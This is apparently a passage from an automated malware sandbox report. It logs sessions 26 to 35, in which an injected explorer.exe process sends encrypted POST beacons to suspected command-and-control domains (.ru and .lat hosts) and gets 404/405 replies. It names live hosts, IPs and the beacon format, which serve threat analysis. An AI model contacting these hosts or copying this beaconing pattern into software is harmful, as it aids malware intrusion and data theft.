                                            26192.168.2.550003194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:07.973406076 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ylfiqfbsvxsdiv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 306
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:07.973427057 CET306OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f0 3c 2d 9e
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)<-lZ2CfoI'!s4vhYO}\&k-cy?K(@4Rh@;:yS3;aV}.{r9v's#*?emETU,P^A_
                                            Dec 19, 2024 11:00:09.309182882 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.55000494.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:14.047979116 CET282OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ggphwqihuaca.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 269
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:14.048084021 CET269OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 92 5c 37 a8
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)\7/2'X}>|*,+Uv<@,F;~={Towt,yO+w)VP m<"w}/Gb%ED7+2nXl|G~KLi~7>k7
                                            Dec 19, 2024 11:00:15.431368113 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:15 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.55000594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:15.556154013 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nbcjwexjjibiqt.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 244
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:15.556154966 CET244OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bb 19 58 a4
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)X0H<a}B6JH7$zHMo>*|PV&rb({uz5ehEeJ`W D/H9Lgq*s*0moI4 k
                                            Dec 19, 2024 11:00:16.925323009 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:16 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.550006194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:17.052778959 CET280OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tjeuikagddjvc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 125
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:17.052819967 CET125OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8e 59 5c b7
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Y\xJ2G2&N)cv^Y
                                            Dec 19, 2024 11:00:18.386399984 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:18 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.55000794.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:22.247304916 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://yylbqgigqdkmsn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 266
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:22.247355938 CET266OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 89 42 71 9f
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Bq=!BQ7ggR7Q=8e"D[{ktbyhsO<m;rb27gd`ma|UZw#sh(H++/uC=s,]
                                            Dec 19, 2024 11:00:23.618141890 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:23 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.55000894.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:23.743700027 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ufirisacqvk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 166
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:23.743736982 CET166OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 85 4c 5e 87
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)L^nA6lc#9SY/+,cb3czaf`zFk|A)xsDV^
                                            Dec 19, 2024 11:00:25.092927933 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:24 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.550009194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:25.219163895 CET279OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ipingdnctvhe.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 333
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:25.219197035 CET333OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fa 18 67 92
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)gj]&dPG(8Bj[>\^.Az0sCWqlaZK'jHyxor'AV;KooJ^/bP\v-`Nuv=4m+Uo;jf3
                                            Dec 19, 2024 11:00:26.560724974 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.55001094.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:30.533154964 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://xvohygrorigngv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 248
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:30.533186913 CET248OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fe 55 28 de
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)U(2L8Ub\4e{36q"3Ej~g\DDu3_qJ}rf_g..N6A>wq~]sjlMtH=^k%`[wndIp^&D
                                            Dec 19, 2024 11:00:31.889817953 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:31 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.55001194.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:32.014364004 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://iqmcbtituxk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 331
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:32.014384985 CET331OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 88 54 59 d0
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)TYziAe^}x]aO}@*lm#1|/E-K\v~0QMNvyFqdY2C5;Qf*~Ga&|O?u{'|9J^s[WmgCr
                                            Dec 19, 2024 11:00:33.379775047 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:33 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.550012194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:33.505337000 CET280OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rfcnfamftxutm.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 335
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:33.510246992 CET335OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 46 3d d9
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)F=nYK5KD{x~ZYEp1*$8fd{U_gZs}+vEsf;_Cb Ko+7Az#9go&oinfOyS3&Eq|uT0
                                            Dec 19, 2024 11:00:34.846632957 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:34 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
